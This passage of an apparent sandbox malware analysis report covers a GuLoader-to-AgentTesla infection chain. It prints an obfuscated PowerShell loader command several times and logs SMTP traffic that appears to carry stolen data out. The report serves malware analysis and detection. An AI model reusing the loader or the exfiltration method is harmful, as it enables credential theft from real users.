2	192.168.2.9	49913	172.67.74.152	443	764	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 15:10:26 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-05 15:10:26 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 15:10:26 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8dddc548de6e35a0-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2569653&cwnd=231&unsent_bytes=0&cid=574213928021ab8a&ts=268&x=0"
2024-11-05 15:10:26 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 Data Ascii: 173.254.250.76

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 5, 2024 16:10:29.785978079 CET	587	49933	208.91.199.223	192.168.2.9	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 5, 2024 16:10:29.786206961 CET	49933	587	192.168.2.9	208.91.199.223	EHLO 760639
Nov 5, 2024 16:10:29.941250086 CET	587	49933	208.91.199.223	192.168.2.9	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 5, 2024 16:10:29.941703081 CET	49933	587	192.168.2.9	208.91.199.223	AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
Nov 5, 2024 16:10:30.099355936 CET	587	49933	208.91.199.223	192.168.2.9	334 UGFzc3dvcmQ6
Nov 5, 2024 16:10:30.264606953 CET	587	49933	208.91.199.223	192.168.2.9	235 2.7.0 Authentication successful
Nov 5, 2024 16:10:30.266959906 CET	49933	587	192.168.2.9	208.91.199.223	MAIL FROM:<tech1@santonswitchgears.com>
Nov 5, 2024 16:10:30.423809052 CET	587	49933	208.91.199.223	192.168.2.9	250 2.1.0 Ok
Nov 5, 2024 16:10:30.424019098 CET	49933	587	192.168.2.9	208.91.199.223	RCPT TO:<tech1@santonswitchgears.com>
Nov 5, 2024 16:10:30.648905993 CET	587	49933	208.91.199.223	192.168.2.9	250 2.1.5 Ok
Nov 5, 2024 16:10:30.651019096 CET	49933	587	192.168.2.9	208.91.199.223	DATA
Nov 5, 2024 16:10:30.807342052 CET	587	49933	208.91.199.223	192.168.2.9	354 End data with <CR><LF>.<CR><LF>
Nov 5, 2024 16:10:30.808073997 CET	49933	587	192.168.2.9	208.91.199.223	.
Nov 5, 2024 16:10:31.091789961 CET	587	49933	208.91.199.223	192.168.2.9	250 2.0.0 Ok: queued as 7F7A2500232

Target ID:	0
Start time:	10:09:48
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\ulf4JrCRk2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ulf4JrCRk2.exe"
Imagebase:	0x400000
File size:	748'528 bytes
MD5 hash:	A8A9F68888009BF9737238846F3B6EC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:09:49
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "
Imagebase:	0x10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1569897869.000000000A302000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:09:49
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:10:09
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x870000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23%
Total number of Nodes:	1257
Total number of Limit Nodes:	34

Executed Functions

Function 00403217 Relevance: 82.6, APIs: 28, Strings: 19, Instructions: 337
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403238
SetErrorMode.KERNELBASE(00008001), ref: 00403243
OleInitialize.OLE32(00000000), ref: 0040324A

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,00000160,00000000,00000009), ref: 00403272

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000000), ref: 0040329A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000020), ref: 004032C5
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
DeleteFileA.KERNELBASE(1033), ref: 00403428
ExitProcess.KERNEL32(?), ref: 004034D1
CoUninitialize.COMBASE(?), ref: 004034D6
ExitProcess.KERNEL32 ref: 004034F6
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000000,?), ref: 00403502
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ,?), ref: 0040357A
CopyFileA.KERNEL32(C:\Users\user\Desktop\ulf4JrCRk2.exe,0041E8B8,00000001), ref: 0040358E
CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 00403614
ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
ExitProcess.KERNEL32 ref: 0040368F

Strings

TEMP, xrefs: 00403407
C:\Users\user\Desktop, xrefs: 00403507, 0040350C, 0040352F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403227
NSIS Error, xrefs: 00403278
C:\Users\user\AppData\Local\Temp\, xrefs: 004033B7, 004033BC, 004033D2, 004033DE, 004033ED, 004033FA, 00403406, 0040340E, 00403501, 0040350D, 00403519, 00403520, 004035CF
C:\Users\user\Desktop\ulf4JrCRk2.exe, xrefs: 00403589
$Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77), xrefs: 00403562, 004035C5
TMP, xrefs: 0040340F
Error launching installer, xrefs: 0040348E
"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 0040353E
\Temp, xrefs: 004033D9
C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 004033A7, 004034A8, 00403527, 00403530
C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 004034B3
SeShutdownPrivilege, xrefs: 00403626
"C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 0040328D, 00403293, 0040344C
", xrefs: 004032EA
Low, xrefs: 004033F5
1033, xrefs: 00403423
~nsu.tmp, xrefs: 004034FC

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandlelstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\ulf4JrCRk2.exe"$"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $$Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77)$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\supersystem\panelet$C:\Users\user\AppData\Roaming\supersystem\panelet$C:\Users\user\Desktop$C:\Users\user\Desktop\ulf4JrCRk2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 2762237255-1150445887
Opcode ID: ad8daaa377ef6082241525d97a33f3446afdd9c228298bd2e1744150241bbf9a
Instruction ID: a1c447b546bb562fff2a187ff51308e62fc677b1bbcaaf8e03341a31a96d3340
Opcode Fuzzy Hash: ad8daaa377ef6082241525d97a33f3446afdd9c228298bd2e1744150241bbf9a
Instruction Fuzzy Hash: DFB1F570608351BAE7216F619C8DA2B3EA89B45706F04443FF541BA2D2C77C9E01CB6E

Function 0040511A Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 280
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040517A
GetDlgItem.USER32(?,000003EE), ref: 00405189
GetClientRect.USER32(?,?), ref: 004051C6
GetSystemMetrics.USER32(00000015), ref: 004051CE
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051EF
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405200
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405213
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405221
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405234
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405256
ShowWindow.USER32(?,00000008), ref: 0040526A
GetDlgItem.USER32(?,000003EC), ref: 0040528B
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040529B
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B4
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052C0
GetDlgItem.USER32(?,000003F8), ref: 00405198

Part of subcall function 00404021: SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F

GetDlgItem.USER32(?,000003EC), ref: 004052DC
CreateThread.KERNELBASE(00000000,00000000,Function_000050AE,00000000), ref: 004052EA
CloseHandle.KERNELBASE(00000000), ref: 004052F1
ShowWindow.USER32(00000000), ref: 00405314
ShowWindow.USER32(?,00000008), ref: 0040531B
ShowWindow.USER32(00000008), ref: 00405361
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405395
CreatePopupMenu.USER32 ref: 004053A6
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053BB
GetWindowRect.USER32(?,000000FF), ref: 004053DB
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053F4
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405430
OpenClipboard.USER32(00000000), ref: 00405440
EmptyClipboard.USER32 ref: 00405446
GlobalAlloc.KERNEL32(00000042,?), ref: 0040544F
GlobalLock.KERNEL32(00000000), ref: 00405459
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546D
GlobalUnlock.KERNEL32(00000000), ref: 00405486
SetClipboardData.USER32(00000001,00000000), ref: 00405491
CloseClipboard.USER32 ref: 00405497

Strings

reckling: Installing, xrefs: 0040540C

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: reckling: Installing
API String ID: 590372296-1062532133
Opcode ID: c4cb536f8e799d3d5e9376cf28b8e230f7fac2783e3879569b83d2f34c1c5795
Instruction ID: 0982c58dd6aff3abb9cbe356e138a5b54def650ce905af7e846a86ee5d5c2f58
Opcode Fuzzy Hash: c4cb536f8e799d3d5e9376cf28b8e230f7fac2783e3879569b83d2f34c1c5795
Instruction Fuzzy Hash: 43A15BB1900208BFDB219FA0DD89AAE7F79FB08345F00407AFA04B61A0C7B55E51DF69

Function 00405D13 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00405014,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000), ref: 00405DC4
GetSystemDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E3F
GetWindowsDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E52
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8E
SHGetPathFromIDListA.SHELL32(00000000,004226A0), ref: 00405E9C
CoTaskMemFree.OLE32(00000000), ref: 00405EA7
lstrcatA.KERNEL32(004226A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC9
lstrlenA.KERNEL32(004226A0,?,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00405014,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000), ref: 00405F1B

Strings

Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", xrefs: 00405D42
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC3
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0E
"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 00405EF3

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2846839831
Opcode ID: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
Instruction ID: c546ec396b89b09005d3c5f1d9b4a4bf58d4ceda60e07cc515ef6374c73a2cb0
Opcode Fuzzy Hash: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
Instruction Fuzzy Hash: 07610471A04A02AAEF216F64DC847BF3B64DB51305F50813BE941B62D1D37C8A42DF9E

Function 004055B1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 004055DA
lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405622
lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405643
lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405649
FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 0040565A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405707
FindClose.KERNEL32(00000000), ref: 00405718

Strings

\*.*, xrefs: 0040561C
"C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 004055B1
C:\Users\user\AppData\Local\Temp\, xrefs: 004055BF

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1937006835
Opcode ID: eb34a846460c19c0258b3e4f17f040ba4638f1e183412731446f157f3717bfe2
Instruction ID: 987af563c2c121d98d0664262626d3ce0c78e9a6bdf03ff904ac809f9c790c88
Opcode Fuzzy Hash: eb34a846460c19c0258b3e4f17f040ba4638f1e183412731446f157f3717bfe2
Instruction Fuzzy Hash: 0F51CF70800A44BADF216A629C45BBF7AB8DF42754F54803BF445B21D2D73C9942EF6E

Function 004062CB Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction ID: b03426f2c8dea12abf8fb2d8b94ab036f7606c67c5ec72f888080e52c6ca951d
Opcode Fuzzy Hash: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction Fuzzy Hash: 3FF15470D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF45

Function 0040601C Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
Instruction ID: d05ccde32c27ce198b4ddd6d941ac6fef01cdbbca41556c28887b76fd68ddc7b
Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
Instruction Fuzzy Hash: 0AE0CD3290411167C320AB749D44E3B73ACAFC5750305483DF506F2151D734AC11E7AD

Function 00405FF5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,00421548,00421100,004058B2,00421100,00421100,00000000,00421100,00421100,?,?,76F92EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406000
FindClose.KERNEL32(00000000), ref: 0040600C

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

